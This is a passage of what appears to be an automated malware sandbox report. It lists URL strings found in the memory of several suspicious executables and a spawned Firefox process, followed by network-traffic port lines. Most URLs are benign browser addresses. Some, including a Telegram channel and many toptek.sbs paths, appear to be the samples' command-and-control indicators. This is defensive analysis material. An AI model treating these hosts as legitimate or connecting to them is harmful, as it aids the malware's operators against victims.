                              Source: 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2903368169.0000000002470000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2835991886.0000000000743000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2835991886.0000000000737000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000000.2804284012.0000000000423000.00000008.00000001.01000000.00000012.sdmpString found in binary or memory: https://t.me/k04ael
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000000.2804284012.0000000000423000.00000008.00000001.01000000.00000012.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://topsites.services.mozilla.com/cid/
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2835991886.0000000000737000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2910218762.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3007832158.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3074857106.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3681831989.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2936416387.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2976897077.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2910218762.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3007832158.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2880430009.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3074857106.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/#
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2880430009.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3074857106.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/)
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3676837046.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3635342426.0000000000785000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3624380603.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2936416387.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3329606785.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3638219476.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3423555296.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3621726681.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3648433704.0000000000785000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3369665575.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3662455343.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3651506331.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3620628902.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3563625535.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3681831989.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/5
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2880430009.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/7
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3007832158.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/=
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3676837046.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3635342426.0000000000785000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3624380603.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2936416387.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3329606785.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3638219476.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2976897077.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3423555296.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3621726681.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3648433704.0000000000785000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3369665575.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3662455343.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3007832158.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3651506331.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3074857106.0000000000739000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3620628902.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3563625535.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3681831989.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/A
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2910218762.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2880430009.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/U
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2880430009.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/Y
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3074857106.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/e
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2910218762.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/g
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2976897077.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/k
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2936416387.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2976897077.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2910218762.000000000073E000.00000004.00000020.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3007832158.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/m
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2910218762.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/q
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
                              Source: firefox.exe, 00000030.00000002.3462121451.0000022389EF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.2835991886.0000000000743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
                              Source: ed7d415177.exe, 00000018.00000003.3248441789.00000000053DC000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3447488113.0000022389DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/schemas/browsing_data
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/https://www.amazon.com/exec/obidos/external-searc
                              Source: firefox.exe, 00000030.00000002.3676285099.000002238E06F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: 85746525a0.exe, 0000000B.00000003.2759360034.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3248441789.00000000053DC000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3447488113.0000022389DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                              Source: firefox.exe, 00000030.00000003.3313163016.000002238E377000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312075480.000002238E31F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3311874121.000002238E100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                              Source: 85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServiceFailed
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchget
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B5EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
                              Source: ed7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                              Source: ed7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                              Source: 85746525a0.exe, 0000000B.00000003.2758762206.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3239964465.0000000005770000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3524238763.000000000B775000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: ed7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                              Source: 85746525a0.exe, 0000000B.00000003.2758762206.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3239964465.0000000005770000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3524238763.000000000B775000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: firefox.exe, 00000030.00000002.3419584209.0000006899EEC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.orgo
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3462121451.0000022389EB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/installDistributionAddonscleanupTemporaryAddons/existing
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/cleanupTemporaryAddons/promise
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
                              Source: firefox.exe, 00000030.00000002.3506483524.000002238A6E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                              Source: firefox.exe, 0000002E.00000002.3260067956.000001D550DAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3295054621.000001D74457F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://071e
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://84a3
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
